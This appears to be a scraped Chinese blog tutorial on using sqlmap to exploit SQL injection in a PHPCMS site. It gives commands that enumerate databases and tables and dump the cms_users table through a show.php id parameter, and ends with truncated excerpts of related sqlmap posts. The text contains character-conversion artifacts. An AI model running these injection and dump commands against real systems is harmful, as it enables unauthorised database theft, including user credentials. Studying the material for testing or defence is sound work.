基於phpcms的sqlmap工具注入

2021-10-23 14:33:11 字數 1574 閱讀 4987

sql注入攻擊是一種常用的攻擊**手段。受影響的**系統: asp+access、asp+sqlserver、php+mysql、php+apache等。

sqlmap是乙個開放原始碼的滲透測試工具,它可以自動探測和利用sql注入漏洞來接管資料庫伺服器。它配備了乙個強大的探測引擎,為最終滲透測試人員提供很多的功能,可以拖庫,可以訪問底層的檔案系統,還可以通過帶外連線執行作業系統上的命令。

sqlmap支援五種sql注入技術:

(1)基於布林值得注入,基於時間的盲注,基於錯誤的盲注,union查詢和stacked查詢;

(2)檢索dbms的會話使用者和資料庫;

(3)列舉使用者、雜湊口令、許可權和資料庫、表、列;

(4)自動識別後台賬戶的雜湊口令,並通過字典進行暴力破解;

sqlmap的基礎命令如下:

sqlmap -u 「注入位址」 -v 1 –-dbs

// 列舉資料庫

sqlmap -u 「注入位址」 -v 1 –-current-db

// 當前資料庫

sqlmap -u 「注入位址」 -v 1 –-users

// 列資料庫使用者

sqlmap -u 「注入位址」 -v 1 –-current-user

// 當前使用者

sqlmap -u 「注入位址」 -v 1 -d 「資料庫」 –-tables

// 列舉資料庫的表名

sqlmap.py -u 「注入位址」 -v 1 -t 「表名」 -d 「資料庫」 –-columns

// 獲取表的列名

sqlmap.py -u 「注入位址」 -v 1 -t 「表名」 -d 「資料庫」 -c 「字段」 –-dump

// 獲取表中的資料

第一步:使用sqlmap命令進行sql注入,獲取資料庫資訊

獲取資料庫

使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms --tables 來獲取web伺服器上的cms資料庫中的表資訊(命令中「-d cms」的意思是指定獲取cms資料庫的表資訊)

使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms -t cms_users --columns來獲取web伺服器上的cms資料庫中的cms_users表中的字段資訊(命令中「-d cms」的意思是指定獲取cms資料庫的表資訊,「-t cms_users"的意思是指定獲取表cms_users中的字段資訊)

使用命令sqlmap -u http://遠端ip:8083/show.php?id=33 -d cms -t cms_users --columns --dump 來獲取web伺服器上的cms資料庫中的cms_users表中字段的資料資訊

sqlmap的注入方式

第一種 普通的注入方式 第一步 首先進行 u操作,比如 u 第二步 進行 d暴庫操作 sqlmap u dbs 第三步 進行 t暴表操作 sqlmap u d user tables 第四步 進行 colums進行暴欄位 sqlmap u d user t use colums 第五步 進行 dum...

有關sqlmap的使用

首先貼一段詳細引數說明,相當於說明書了 sqlmap詳細命令 options 選項 target 目標 以下至少需要設定其中乙個選項,設定目標url。request 請求 這些選項可以用來指定如何連線到目標url。enumeration 列舉 這些選項可以用來列舉後端資料庫管理系統的資訊 表中的結構...

sqlmap的安裝教程

由於sqlmap是利用python語言寫的,所以需要將python這個語言環境給安裝上,以下是詳細安裝過程 準備工作 step2.python2.7.11安裝 2.2.預設,next 2.3.將 add python.exe to path 項勾選,勾選後安裝完成不再需要單獨新增環境變數,預設是 去...